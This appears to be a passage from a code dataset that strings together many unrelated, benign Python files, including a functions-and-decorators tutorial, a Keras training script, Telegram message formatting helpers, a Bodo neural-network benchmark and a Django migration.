print('Keyword arguments:', kwargs)
print_kwargs(wine='merlot', entree='mutton', dessert='macaroon')
# Docstrings
# Functions Are First-Class Citizens
def add_args(arg1, arg2):
print(arg1 + arg2)
def run_something_with_args(func, arg1, arg2):
func(arg1, arg2)
print(run_something_with_args(add_args, 5, 4))
# another example with *arg and **kwarg
def sum_args(*args):
return sum(args)
def run_with_positional_args(func, *args):
return func(*args)
print(run_with_positional_args(sum_args, 1, 2, 3, 4, 5))
# Closure functions examples
def parent_function(name):
def child_function():
print("I am a child function called " + name)
return child_function
closure = parent_function('Gio10')
print(closure)
print(type(closure))
closure()
# Anonymous Functions: the lambda() Function
def edit_story(words, func):
for word in words:
print(func(word))
stairs = ['thud', 'meow', 'thud', 'hiss']
def enliven(word): # give that prose more punch
return word.capitalize() + '!'
# edit_story(stairs, enliven)
edit_story(stairs, lambda arg: arg.capitalize() + '!')
def my_range(first=0, last=10, step=1):
number = first
while number < last:
yield number * 2
number += step
ranger = my_range(1, 20)
print(ranger)
for item in ranger:
print(item)
# Decorators
def document_it(func):
def new_function(*args, **kwargs):
print('Running function:', func.__name__)
print('Positional arguments:', args)
print('Keyword arguments:', kwargs)
result = func(*args, **kwargs)
print('Result:', result)
return result
return new_function
# Another decorator
def square_it(func):
def new_function(*args, **kwargs):
result = func(*args, **kwargs)
return result * result
return new_function
@square_it
@document_it
def add_ints(a, b):
return a + b
print(add_ints(3, 5))
# Manual decorator
cooler_add_ints = document_it(add_ints)
cooler_add_ints(3, 5)
# No manual
print(add_ints(3, 5))
# Things to Do
# 4.4
numbers = [number for number in range(10)]
print(numbers)
# 4.5
squares = {number: number*number for number in range(10)}
print(squares)
# 4.6
odd_numbers = set(number for number in range(10) if number % 2 == 1)
print(odd_numbers)
# 4.7
for item in ['Got %s' % num for num in range(10)]:
print(item)
| StarcoderdataPython |
61558 | <reponame>twerkmeister/table-segmenter
import argparse
from typing import Text
import os
import table_segmenter.model
import table_segmenter.io
import table_segmenter.preprocessing
import table_segmenter.metrics
import tensorflow
from tensorflow import keras
def load_data_for_training(data_path: Text):
"""Convenience method."""
image_names, images = table_segmenter.io.load_images(data_path)
targets = table_segmenter.io.load_targets(data_path, image_names)
original_image_shapes = [image.shape for image in images]
x = table_segmenter.preprocessing.preprocess_images(images)
x_augmented, augmented_targets = \
table_segmenter.preprocessing.augment_multi(x, targets, original_image_shapes)
y = table_segmenter.preprocessing.preprocess_targets(augmented_targets)
return x_augmented, y
def train(train_data_path: Text, val_data_path: Text, experiment_dir: Text):
tensorflow.compat.v1.disable_eager_execution()
# tensorflow.config.run_functions_eagerly(True)
os.makedirs(experiment_dir, exist_ok=True)
tensorboard_callback = keras.callbacks.TensorBoard(log_dir=experiment_dir)
early_stopping_callback = keras.callbacks.EarlyStopping("val_loss", patience=7,
verbose=1,
restore_best_weights=True)
print("Loading training data")
x_train, y_train = load_data_for_training(train_data_path)
print("Loading validation data")
x_val, y_val = load_data_for_training(val_data_path)
model = table_segmenter.model.build()
model.compile(loss=table_segmenter.metrics.combined_loss,
optimizer='adam',
# run_eagerly=True,
metrics=[table_segmenter.metrics.regression_mean_absolute_error,
table_segmenter.metrics.decision_accuracy,
table_segmenter.metrics.regression_mean_error,
table_segmenter.metrics.regression_error_stddev])
model.fit(x_train,
y_train,
validation_data=(x_val, y_val),
epochs=80,
batch_size=16,
verbose=True,
callbacks=[tensorboard_callback, early_stopping_callback])
model.save(experiment_dir)
# MAE evaluation
score = model.evaluate(x_val,
y_val,
batch_size=16,
verbose=True)
print("nTest MAE: %.1f%%" % (score[1]))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='train the table segmenter.')
parser.add_argument("train_data_path",
help='Path to the training data folder.')
parser.add_argument("val_data_path",
help='Path to the validation data folder.')
parser.add_argument("experiment_folder",
help='Path to the output folder for the model and logs.')
args = parser.parse_args()
train(args.train_data_path, args.val_data_path, args.experiment_folder)
| StarcoderdataPython |
9624002 | <reponame>Den4200/pyfrost
import socket
from typing import Optional, Tuple
class UserObj:
"""Represents a user.
:param addr: The IP address and port of the connected user
:type addr: Tuple[str, int]
:param conn: The socket instance of the connected user
:type conn: 'socket.socket'
:param id_: The user's ID, defaults to None
:type id_: Optional[int]
:param username: The user's username, defaults to None
:type username: Optional[str]
"""
def __init__(
self,
addr: Tuple[str, int],
conn: 'socket.socket',
id_: Optional[int] = None,
username: Optional[str] = None
) -> None:
"""The constructor method.
"""
self.addr = addr
self.conn = conn
self.id = id_
self.username = username
@property
def is_logged_in(self) -> bool:
"""Returns whether or not the user is logged in.
:return: Whether or not the user is logged in
:rtype: bool
"""
return self.id is not None and self.username is not None
def login(self, id_: int, username: str) -> None:
"""Sets the user's ID and username, "logging them in".
:param id_: The user's ID
:type id_: int
:param username: The user's username
:type username: str
"""
self.id = id_
self.username = username
class Memory:
"""Stores information that needs to be passed around and easily accessible.
"""
all_users = dict()
"""All connected users.
"""
logged_in_users = dict()
"""All logged in users.
"""
| StarcoderdataPython |
1784214 | <filename>preprocess_ct_scans.py
import os
import pydicom
import joblib
import dicom_numpy
from fastai.medical.imaging import get_dicom_files
from preprocess_volumes import CleanCTScans
from joblib import Parallel, delayed
def get_ct_scan_as_list_of_pydicoms(folder, destination_folder):
list_of_dicom_files = get_dicom_files(folder)
scan = [pydicom.dcmread(f) for f in list_of_dicom_files]
scan = dicom_numpy.sort_by_slice_position(scan)
file_path = f"{destination_folder}/{scan[0].PatientID}.pkl"
joblib.dump(scan, file_path)
return f'Saved file - {file_path}'
def save_each_scan_as_pickle(source_folder, destination_folder):
if not os.path.isdir(destination_folder):
os.makedirs(destination_folder)
folders = [os.path.join(source_folder, folder) for folder in os.listdir(source_folder) if
not folder.startswith('.')]
results = Parallel(n_jobs=max(10,len(folders)))(delayed(get_ct_scan_as_list_of_pydicoms)(im_file, destination_folder)
for im_file in folders)
print(*results, sep='\n')
print(len(folders))
source = "../data/Tampered_Scans/Experiment-2-Open/"
destination = './pickled_scans/test'
# save_each_scan_as_pickle(source, destination)
source = "../data/Tampered_Scans/Experiment-1-Blind/"
destination = './pickled_scans/train'
# save_each_scan_as_pickle(source, destination)
cleaner = CleanCTScans("run", "", "", "logs", "./pickled_scans/train", "../cleaned_scans")
| StarcoderdataPython |
42025 | <filename>programa idade/ex002.py
def idade_pessoa(id):
idp = int(id)
if idp <0:
return 'idade inválida'
elif idp <12:
return 'você ainda é uma criança'
elif idp <18:
return 'você é adolecente'
elif idp <65:
return 'Você já é adulto'
elif idp <100:
return 'você está na melhor idade'
else:
return 'você é uma pessoa centenária'
| StarcoderdataPython |
4994499 | <reponame>smoorjani/Diabetes-Classifer
import pandas as pd
import numpy as np
df = pd.read_csv('diabetes.csv',usecols=[i for i in range(8)])
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(df)
scaled = scaler.transform(df)
df_columns = df.columns[:8]
scaled_df = pd.DataFrame(scaled,columns=df_columns)
from sklearn.decomposition import PCA
from sklearn import preprocessing
scaled_df = preprocessing.scale(scaled_df.T)
pca = PCA()
pca.fit(scaled_df)
pca_df = pca.transform(scaled_df)
percentage_variation = np.round(pca.explained_variance_ratio_*100,decimals = 2)
labels = df.columns
import seaborn as sns
import matplotlib.pyplot as plt
ax = sns.barplot(x=list(range(1,len(percentage_variation)+1)),y=percentage_variation)
ax.set_xticklabels(labels,rotation=90)
#plt.bar(x=range(1,len(percentage_variation)+1),height=percentage_variation,tick_label=labels)
plt.xlabel('Principal Components')
plt.ylabel('Percentage of Explained Variance')
plt.title('Scree Plot of PCA on our Dataset')
plt.tight_layout()
plt.savefig('pca.png')
print(labels)
PCA_labels = ['PC'+str(x) for x in range(1,len(percentage_variation)+1)]
pca_dfa = pd.DataFrame(pca_df,index=labels,columns=PCA_labels)
plt.scatter(pca_dfa.PC1,pca_dfa.PC2)
plt.title('Correlation in Data based on PCA')
plt.xlabel('PC1 - {0}%'.format(percentage_variation[0]))
plt.ylabel('PC2 - {0}%'.format(percentage_variation[1]))
for val in pca_dfa.index:
plt.annotate(val,(pca_dfa.PC1.loc[val],pca_dfa.PC2.loc[val]))
plt.show()
| StarcoderdataPython |
1887981 | def _apply_entities(text, entities, escape_map, format_map):
# Split string into char sequence and escape in-place to
# preserve index positions.
seq = list(map(lambda c, i:
escape_map[c] # escape special characters
if c in escape_map
else c,
list(text), # split string to char sequence
range(0, len(text)))) # along with each char's index
# Ensure smaller offsets come first
sorted_entities = sorted(entities, key=lambda e: e['offset'])
offset = 0
result = ''
for e in sorted_entities:
f, n, t = e['offset'], e['length'], e['type']
result += ''.join(seq[offset:f])
if t in format_map:
# apply format
result += format_map[t](''.join(seq[f:f + n]), e)
else:
result += ''.join(seq[f:f + n])
offset = f + n
result += ''.join(seq[offset:])
return result
def apply_entities_as_markdown(text, entities):
"""
Format text as Markdown. Also take care of escaping special characters.
Returned value can be passed to :meth:`.Bot.sendMessage` with appropriate
``parse_mode``.
:param text:
plain text
:param entities:
a list of `MessageEntity <https://core.telegram.org/bots/api#messageentity>`_ objects
"""
escapes = {
'*': '\\*',
'_': '\\_',
'[': '\\[',
']': '\\]',
'`': '\\`',
'(': '\\(',
')': '\\)',
'~': '\\~',
'>': '\\>',
'#': '\\#',
'+': '\\+',
'-': '\\-',
'=': '\\=',
'|': '\\|',
'{': '\\{',
'}': '\\}',
'.': '\\.',
'!': '\\!'
}
formatters = {
'bold': lambda s, e: '*' + s + '*',
'italic': lambda s, e: '_' + s + '_',
'text_link': lambda s, e: '[' + s + '](' + e['url'] + ')',
'text_mention': lambda s, e: '[' + s + '](tg://user?id=' + str(e['user']['id']) + ')',
'code': lambda s, e: '`' + s + '`',
'pre': lambda s, e: '```text\n' + s + '```',
'underline': lambda s, e: '__' + s + '__',
'strikethrough': lambda s, e: '~' + s + '~'
}
return _apply_entities(text, entities, escapes, formatters)
def apply_entities_as_html(text, entities):
"""
Format text as HTML. Also take care of escaping special characters.
Returned value can be passed to :meth:`.Bot.sendMessage` with appropriate
``parse_mode``.
:param text:
plain text
:param entities:
a list of `MessageEntity <https://core.telegram.org/bots/api#messageentity>`_ objects
"""
escapes = {'<': '<',
'>': '>',
'&': '&', }
formatters = {
'bold': lambda s, e: '<b>' + s + '</b>',
'italic': lambda s, e: '<i>' + s + '</i>',
'text_link': lambda s, e: '<a href="' + e['url'] + '">' + s + '</a>',
'text_mention': lambda s, e: '<a href="tg://user?id=' + str(e['user']['id']) + '">' + s + '</a>',
'code': lambda s, e: '<code>' + s + '</code>',
'pre': lambda s, e: '<pre>' + s + '</pre>',
'underline': lambda s, e: '<u>' + s + '</u>',
'strikethrough': lambda s, e: '<s>' + s + '</s>'
}
return _apply_entities(text, entities, escapes, formatters)
| StarcoderdataPython |
8179953 | from pathlib import Path
import pytest # type: ignore
from ape import Project, networks
from ape_http.providers import EthereumNetworkConfig
from ape_hardhat import HardhatProvider
def get_project():
return Project(Path(__file__).parent)
def get_network_config():
p = get_project()
config_classes = [
klass for (name, klass) in p.config.plugin_manager.config_class if name == "hardhat"
]
assert len(config_classes) == 1
config = config_classes[0]()
# need to instantiate a new instance of this otherwise it's shared across HH instances
config.ethereum = EthereumNetworkConfig()
# bump up the timeouts to decrease chance of tests flaking due to race conditions
config.network_retries = [0.1, 0.2, 0.3, 0.5, 0.5, 1, 1, 1, 1, 1, 1, 5]
config.process_attempts = 10
return config
@pytest.fixture
def project():
return get_project()
@pytest.fixture
def network_api():
return networks.ecosystems["ethereum"]["development"]
@pytest.fixture
def network_config(project):
return get_network_config()
@pytest.fixture
def hardhat_provider(network_api, network_config):
hh = HardhatProvider("hardhat", network_api, network_config, {}, Path("."), "")
hh.connect()
return hh
| StarcoderdataPython |
298620 | <reponame>copini/ha-sagemcom-fast
"""Options flow for Sagemcom integration."""
from homeassistant import config_entries
from homeassistant.const import CONF_SCAN_INTERVAL
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from .const import DEFAULT_SCAN_INTERVAL, MIN_SCAN_INTERVAL
class OptionsFlow(config_entries.OptionsFlow):
"""Handle a options flow for Sagemcom."""
def __init__(self, config_entry):
"""Initialize Sagemcom options flow."""
self._options = dict(config_entry.options)
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
return self.async_show_form(
step_id="init",
data_schema=vol.Schema(
{
vol.Optional(
CONF_SCAN_INTERVAL,
default=self._options.get(
CONF_SCAN_INTERVAL, DEFAULT_SCAN_INTERVAL
),
): vol.All(cv.positive_int, vol.Clamp(min=MIN_SCAN_INTERVAL))
}
),
)
| StarcoderdataPython |
1874367 | # Write a function which takes an array of numbers as input and returns the product of them all
# Example:
# product_of_array([1,2,3]) => 6
# product_of_array([1,2,3,4]) => 24
def product_of_array(arr):
arr_len = len(arr)
if arr_len == 0:
return 1
else:
return arr[0] * product_of_array(arr[1:])
if __name__ == '__main__':
arr_len = int(input('Input the length of array:'))
arr = [0]*arr_len
for i in range(arr_len):
arr[i] = int(input(f"Enter element#{i}:"))
print(product_of_array(arr))
| StarcoderdataPython |
5097576 | from pykechain.models.widgets.widget import Widget
from pykechain.models.widgets.widget_schemas import undefined_meta_schema
# UNDEFINED = 'UNDEFINED'
# PROPERTYGRID = 'PROPERTYGRID'
# SUPERGRID = 'SUPERGRID'
# HTML = 'HTML'
# FILTEREDGRID = 'FILTEREDGRID'
# SERVICE = 'SERVICE'
# NOTEBOOK = 'NOTEBOOK'
# ATTACHMENTVIEWER = 'ATTACHMENTVIEWER'
# TASKNAVIGATIONBAR = 'TASKNAVIGATIONBAR'
# JSON = 'JSON'
# METAPANEL = 'METAPANEL'
# MULTICOLUMN = 'MULTICOLUMN'
# SCOPE_WIDGET = 'SCOPE_WIDGET'
# THIRD_PARTY = 'THIRD_PARTY'
# PROGRESS = 'PROGRESS'
# SIGNATURE = 'SIGNATURE'
# CARD = 'CARD'
# WEATHER = 'WEATHER'
# DASHBOARD = 'DASHBOARD'
# SCOPEMEMBERS = 'SCOPEMEMBERS'
class MetapanelWidget(Widget):
"""Metapanel Widget."""
class PropertygridWidget(Widget):
"""Propertygrid Widget."""
class UndefinedWidget(Widget):
"""Undefined Widget."""
schema = undefined_meta_schema
class FilteredgridWidget(Widget):
"""Filteredgrid Widget."""
class SupergridWidget(Widget):
"""Supergrid Widget."""
class AttachmentviewerWidget(Widget):
"""Attachmentviewer Widget."""
class TasknavigationbarWidget(Widget):
"""Tasknavigationbar Widget."""
class HtmlWidget(Widget):
"""HTML Widget."""
class ServiceWidget(Widget):
"""Service Widget."""
class NotebookWidget(Widget):
"""Notebook Widget."""
class JsonWidget(Widget):
"""JSON Widget."""
class MulticolumnWidget(Widget):
"""Multicolumn Widget."""
class ProgressWidget(Widget):
"""Progress bar Widget."""
class ScopeWidget(Widget):
"""Scope grid Widget."""
class SignatureWidget(Widget):
"""Signature Widget."""
class CardWidget(Widget):
"""Card Widget."""
class ThirdpartyWidget(Widget):
"""Thirdparty Widget."""
class TasksWidget(Widget):
"""Tasks Widget."""
class WeatherWidget(Widget):
"""Weather Widget."""
class ServicecardWidget(Widget):
"""ServiceCard Widget."""
class DashboardWidget(Widget):
"""Dashboard Widget."""
class ScopemembersWidget(Widget):
"""ScopeMembers Widget."""
| StarcoderdataPython |
1722954 | '''
The sum of the squares of the first ten natural numbers is,
12 + 22 + ... + 102 = 385
The square of the sum of the first ten natural numbers is,
(1 + 2 + ... + 10)2 = 552 = 3025
Hence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is 3025 − 385 = 2640.
Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.
'''
# Initializing variables
sum_of_the_squares = 0
square_of_the_sum = 0
# Sum of the Squares
for i in range(101):
n = i**2
sum_of_the_squares = sum_of_the_squares + n
square_of_the_sum = square_of_the_sum + i
print("The difference between the sum of the squares of the first one hundred natural numbers and the square of the sum is " + str(square_of_the_sum**2 - sum_of_the_squares))
| StarcoderdataPython |
5008672 | <reponame>ferhatelmas/algo
class Solution:
def countGoodSubstrings(self, s: str) -> int:
return sum(len(set(s[i : i + 3])) == 3 for i in range(0, len(s) - 2))
| StarcoderdataPython |
1616594 | <gh_stars>1-10
import urllib.parse
import urllib.request
import os
import shutil
from PIL import Image
import img2pdf
def createPDF(bookInfo, startPage, endPage):
def directoryPath():
return f"{bookInfo['Title']}"
def filePath(i):
return directoryPath() + f"/{i}.{bookInfo['Image Format']}"
def makeDirectory(name):
print("Creating directory...")
try:
currentPath = os.getcwd()
os.mkdir(f"{currentPath}/{name}")
print("Created directory.")
except:
print("Directory is already present.")
def showProgress(blockNum, blockSize, totalSize):
percent = blockNum * blockSize / totalSize
ending = " "
if percent > 1:
percent = 1
ending = "\n"
print("{:.0%}".format(percent), end=ending)
def downloadPage(i, key):
URL = bookInfo["Key"] + str(key) + "." + bookInfo["Image Format"]
# print(f"Downloading page #{i+1} from: " + URL + "\n")
print(f"Downloading page #{i+1}...")
tries = 0
maxTries = 10
while tries < maxTries:
try:
# print(" Connection attempt #" + str(tries + 1))
urllib.request.urlretrieve(urllib.parse.quote(URL).replace("%3A", ":"), filePath(i + 1))
break
except:
tries += 1
def makeBlankPageBackground(i):
path = filePath(i + 1)
page = Image.open(path).convert('RGBA')
background = Image.new('RGBA', page.size, (255,255,255))
alphaComposite = Image.alpha_composite(background, page)
alphaComposite.convert('RGB').save(path, "PNG")
def manipulatePages():
print("Beginning to download all pages...\n")
for i in range(startPage - 1, endPage):
if i == 0:
k = ''
else:
k = i
downloadPage(i, k)
makeBlankPageBackground(i)
print("")
def makePDF():
print("Making PDF File...")
makeDirectory("Books")
PDFPath = f"Books/{bookInfo['Title']}.pdf"
with open(PDFPath, "wb") as PDFFile:
pages = []
for i in range(startPage - 1, endPage):
pages.append(filePath(i + 1))
PDFFile.write(img2pdf.convert(pages))
makeDirectory(bookInfo['Title'])
manipulatePages()
makePDF()
print("Finished! Your book is in the 'Books' folder")
shutil.rmtree(directoryPath(), ignore_errors=True)
| StarcoderdataPython |
3444792 | <gh_stars>0
"""
Original code available at:
https://github.com/udacity/deep-learning-v2-pytorch/tree/master/
intro-neural-networks/student-admissions
# Predicting Student Admissions with Neural Networks
In this notebook, we predict student admissions to graduate school at UCLA
based on three pieces of data:
- GRE Scores (Test)
- GPA Scores (Grades)
- Class rank (1-4)
The dataset originally came from here: http://www.ats.ucla.edu/
## Loading the data
To load the data and format it nicely, we will use two very useful packages
called Pandas and Numpy. You can read on the documentation here:
- https://pandas.pydata.org/pandas-docs/stable/
- https://docs.scipy.org/
admit, gre, gpa, rank
int, int, float, int
"""
import time
from pathlib import Path
import bodo
import numpy as np
import pandas as pd
# local
from bodoai_examples.utils import bd_zip
def setup():
# bodo doesn't work well with pd.read_csv with compound path,
# constant path works well.
filename = 'student_data.csv'
filepath = str(Path(__file__).parent / filename)
data = pd.read_csv(filepath)
print('Original data shape:', data.shape)
# duplicate data just for benchmark propose
dfs = []
for i in range(100):
dfs.append(data)
data = pd.concat(dfs).reset_index(drop=True)
data.to_csv(str(Path('/tmp/') / filename), index=None)
print('Replicated data shape:', data.shape)
# ======================================================
# Pure python/numpy
# ======================================================
def read_data():
# Reading the csv file into a pandas DataFrame
return pd.read_csv('/tmp/student_data.csv')
# Activation (sigmoid) function
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def sigmoid_prime(x):
return sigmoid(x) * (1 - sigmoid(x))
def error_formula(y, output):
return -y * np.log(output) - (1 - y) * np.log(1 - output)
# Backpropagate the error
# Now it's your turn to shine. Write the error term. Remember that
# this is given by the equation (𝑦−𝑦̂ )𝜎′(𝑥)
def error_term_formula(x, y, output):
return (y - output) * sigmoid_prime(x)
# Training function
def train_nn(features, targets, epochs, learnrate):
# Use to same seed to make debugging easier
np.random.seed(42)
n_records, n_features = features.shape
last_loss = None
# Initialize weights
weights = np.random.normal(
0.0, scale=1 / n_features ** 0.5, size=n_features
)
for e in range(epochs):
del_w = np.zeros(weights.shape)
for x, y in zip(features.values, targets):
# Loop through all records, x is the input, y is the target
# Activation of the output unit
# Notice we multiply the inputs and the weights here
# rather than storing h as a separate variable
output = sigmoid(np.dot(x, weights))
# The error, the target minus the network output
# error = error_formula(y, output)
# The error term
error_term = error_term_formula(x, y, output)
# The gradient descent step, the error times the gradient times
# the inputs
del_w += error_term * x
# Update the weights here. The learning rate times the
# change in weights, divided by the number of records to average
weights += learnrate * del_w / n_records
# Printing out the mean square error on the training set
if e % (epochs / 10) == 0:
out = sigmoid(np.dot(features, weights))
loss = np.mean((out - targets) ** 2)
print("Epoch:", e, end=', ')
if last_loss and last_loss < loss:
print("Train loss: ", loss, " WARNING - Loss Increasing")
else:
print("Train loss: ", loss)
last_loss = loss
print("Finished training!")
print("=" * 50)
return weights
def main():
data = read_data()
# TODO: Make dummy variables for rank
one_hot_data = pd.get_dummies(data, columns=['rank'])
# Scaling the data
#
# The next step is to scale the data. We notice that the range for
# grades is 1.0-4.0, whereas the range for test scores is roughly
# 200-800, which is much larger. This means our data is skewed, and
# that makes it hard for a neural network to handle. Let's fit our
# two features into a range of 0-1, by dividing the grades by 4.0,
# and the test score by 800.
# Making a copy of our data
processed_data = one_hot_data[:]
# TODO: Scale the columns
processed_data['gre'] /= processed_data['gre'].max()
processed_data['gpa'] /= processed_data['gpa'].max()
# Splitting the data into Training and Testing
#
# In order to test our algorithm, we'll split the data into a Training
# and a Testing set. The size of the testing set will be 10% of the
# total data.
sample = np.random.choice(
processed_data.index,
size=int(len(processed_data) * 0.9),
replace=False,
)
train_data, test_data = processed_data.iloc[sample], processed_data.drop(
sample
)
print("Number of training samples is", len(train_data))
print("Number of testing samples is", len(test_data))
# Splitting the data into features and targets (labels)
#
# Now, as a final step before the training, we'll split the data into
# features (X) and targets (y).
features = train_data.drop('admit', axis=1)
targets = train_data['admit']
features_test = test_data.drop('admit', axis=1)
targets_test = test_data['admit']
# Training the 2-layer Neural Network
#
# The following function trains the 2-layer neural network. First,
# we'll write some helper functions.
# Neural Network hyperparameters
epochs = 1000
learnrate = 0.5
weights = train_nn(features, targets, epochs, learnrate)
# Calculate accuracy on test data
test_out = sigmoid(np.dot(features_test, weights))
predictions = test_out > 0.5
accuracy = np.mean(predictions == targets_test)
print("Prediction accuracy: {:.3f}".format(accuracy))
# ======================================================
# with bodo
# ======================================================
@bodo.jit
def bd_read_data():
# Reading the csv file into a pandas DataFrame
# admit, gre, gpa, rank
# int, int, float, int
return pd.read_csv(
'/tmp/student_data.csv',
dtype={
'admit': np.float64,
'gre': np.float64,
'gpa': np.float64,
'rank': np.int64,
},
)
# Activation (sigmoid) function
@bodo.jit
def bd_sigmoid(x):
return 1 / (1 + np.exp(-x))
@bodo.jit
def bd_sigmoid_prime(x):
return bd_sigmoid(x) * (1 - bd_sigmoid(x))
@bodo.jit
def bd_error_formula(y, output):
return -y * np.log(output) - (1 - y) * np.log(1 - output)
# Backpropagate the error
# Now it's your turn to shine. Write the error term. Remember that
# this is given by the equation (𝑦−𝑦̂ )𝜎′(𝑥)
@bodo.jit
def bd_error_term_formula(x, y, output):
return (y - output) * bd_sigmoid_prime(x)
# Training function
@bodo.jit
def bd_train_nn(features, targets, epochs, learnrate):
# Use to same seed to make debugging easier
np.random.seed(42)
n_records, n_features = features.shape
last_loss = -9999999999.9
# Initialize weights
weights = np.random.normal(0.0, 1 / n_features ** 0.5, n_features)
for e in range(epochs):
del_w = np.zeros(weights.shape)
for x, y in bd_zip(features.values, targets):
# Loop through all records, x is the input, y is the target
# Activation of the output unit
# Notice we multiply the inputs and the weights here
# rather than storing h as a separate variable
output = bd_sigmoid(np.dot(x, weights))
# The error, the target minus the network output
# error = bd_error_formula(y, output)
# The error term
error_term = bd_error_term_formula(x, y, output)
# The gradient descent step, the error times the gradient times
# the inputs
del_w += error_term * x
# Update the weights here. The learning rate times the
# change in weights, divided by the number of records to average
weights += learnrate * del_w / n_records
# Printing out the mean square error on the training set
if e % (epochs / 10) == 0:
out = bd_sigmoid(np.dot(features.values, weights))
loss = np.mean((out - targets) ** 2)
msg = "Epoch:" + str(e) + ','
if last_loss and last_loss < loss:
print(msg, "Train loss: ", loss, " WARNING - Loss Increasing")
else:
print(msg, "Train loss: ", loss)
last_loss = loss
print("Finished training!")
print("=" * 50)
return weights
def bd_main():
# str(Path(__file__).parent / 'student_data.csv')
data = bd_read_data()
# TODO: Make dummy variables for rank
one_hot_data = pd.get_dummies(data, columns=['rank']).astype(np.float64)
# Scaling the data
#
# The next step is to scale the data. We notice that the range for
# grades is 1.0-4.0, whereas the range for test scores is roughly
# 200-800, which is much larger. This means our data is skewed, and
# that makes it hard for a neural network to handle. Let's fit our
# two features into a range of 0-1, by dividing the grades by 4.0,
# and the test score by 800.
# Making a copy of our data
processed_data = one_hot_data[:]
# TODO: Scale the columns
processed_data['gre'] /= processed_data['gre'].max()
processed_data['gpa'] /= processed_data['gpa'].max()
# Splitting the data into Training and Testing
#
# In order to test our algorithm, we'll split the data into a Training
# and a Testing set. The size of the testing set will be 10% of the
# total data.
sample = np.random.choice(
processed_data.index,
size=int(len(processed_data) * 0.9),
replace=False,
)
train_data = processed_data.iloc[sample].reset_index(drop=True)
test_data = processed_data.drop(sample).reset_index(drop=True)
print("Number of training samples is", len(train_data))
print("Number of testing samples is", len(test_data))
# Splitting the data into features and targets (labels)
#
# Now, as a final step before the training, we'll split the data into
# features (X) and targets (y).
features = train_data.drop('admit', axis=1)
targets = train_data['admit']
features_test = test_data.drop('admit', axis=1)
targets_test = test_data['admit']
# Training the 2-layer Neural Network
#
# The following function trains the 2-layer neural network. First,
# we'll write some helper functions.
# Neural Network hyperparameters
epochs = 1000
learnrate = 0.5
weights = bd_train_nn(features, targets, epochs, learnrate)
# Calculate accuracy on test data
test_out = bd_sigmoid(np.dot(features_test, weights))
predictions = test_out > 0.5
accuracy = np.mean(predictions == targets_test)
print("Prediction accuracy: {:.3f}".format(accuracy))
if __name__ == '__main__':
setup()
t0 = time.time()
main()
t1 = time.time()
print('=' * 50)
print('Training time using pure python/numpy:', t1 - t0, 's')
print('=' * 50)
t0 = time.time()
bd_main()
t1 = time.time()
print('=' * 50)
print('Training time using bodo:', t1 - t0, 's')
print('=' * 50)
| StarcoderdataPython |
8141844 | # Generated by Django 2.1.2 on 2018-10-31 11:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('russian', '0003_auto_20181026_1250'),
]
operations = [
migrations.CreateModel(
name='User_Word',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('word_number', models.IntegerField(verbose_name='Word Number')),
('time', models.DateTimeField(verbose_name='Time')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| StarcoderdataPython |
12809572 | <gh_stars>1-10
# stdlib
import dataclasses
from uuid import UUID
# third party
import sympc
from sympc.config import Config
from sympc.tensor import ReplicatedSharedTensor
# syft absolute
import syft
# syft relative
from ...generate_wrapper import GenerateWrapper
from ...lib.torch.tensor_util import protobuf_tensor_deserializer
from ...lib.torch.tensor_util import protobuf_tensor_serializer
from ...proto.lib.sympc.replicatedshared_tensor_pb2 import (
ReplicatedSharedTensor as ReplicatedSharedTensor_PB,
)
from ..python.primitive_factory import PrimitiveFactory
def object2proto(obj: object) -> ReplicatedSharedTensor_PB:
share: ReplicatedSharedTensor = obj
session_uuid = ""
config = {}
if share.session_uuid is not None:
session_uuid = str(share.session_uuid)
config = dataclasses.asdict(share.config)
session_uuid_syft = session_uuid
conf_syft = syft.serialize(
PrimitiveFactory.generate_primitive(value=config), to_proto=True
)
proto = ReplicatedSharedTensor_PB(session_uuid=session_uuid_syft, config=conf_syft)
for tensor in share.shares:
proto.tensor.append(protobuf_tensor_serializer(tensor))
return proto
def proto2object(proto: ReplicatedSharedTensor_PB) -> ReplicatedSharedTensor:
if proto.session_uuid:
session = sympc.session.get_session(proto.session_uuid)
if session is None:
raise ValueError(f"The session {proto.session_uuid} could not be found")
config = dataclasses.asdict(session.config)
else:
config = syft.deserialize(proto.config, from_proto=True)
output_shares = []
for tensor in proto.tensor:
output_shares.append(protobuf_tensor_deserializer(tensor))
share = ReplicatedSharedTensor(shares=None, config=Config(**config))
if proto.session_uuid:
share.session_uuid = UUID(proto.session_uuid)
share.shares = output_shares
return share
GenerateWrapper(
wrapped_type=ReplicatedSharedTensor,
import_path="sympc.tensor.ReplicatedSharedTensor",
protobuf_scheme=ReplicatedSharedTensor_PB,
type_object2proto=object2proto,
type_proto2object=proto2object,
)
| StarcoderdataPython |
11230813 | <filename>emscore/__init__.py
__version__ = "0.0.1"
from .scorer import *
| StarcoderdataPython |
1711682 | from pathlib import Path
BASE_DIR = Path(__file__).resolve(strict=True).parents[1]
GODOT_PROJECT = BASE_DIR / 'script_runner' / 'project'
PYTHON_PACKAGE = 'script_runner'
GDNATIVE_LIBRARY = 'script_runner.gdnlib'
| StarcoderdataPython |
9750845 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
ACR_PLACEHOLDER = 'container_registry_name_place_holder'
APP_NAME_PLACEHOLDER = 'app_name_place_holder'
PORT_NUMBER_PLACEHOLDER = 'port_number_place_holder'
CLUSTER_PLACEHOLDER = 'cluster_name_place_holder'
RG_PLACEHOLDER = 'resource_name_place_holder'
PORT_NUMBER_DEFAULT = '8080'
APP_NAME_DEFAULT = 'k8sdemo'
RELEASE_NAME = 'aksappupdemo'
# Checkin message strings
CHECKIN_MESSAGE_AKS = 'Setting up AKS deployment workflow'
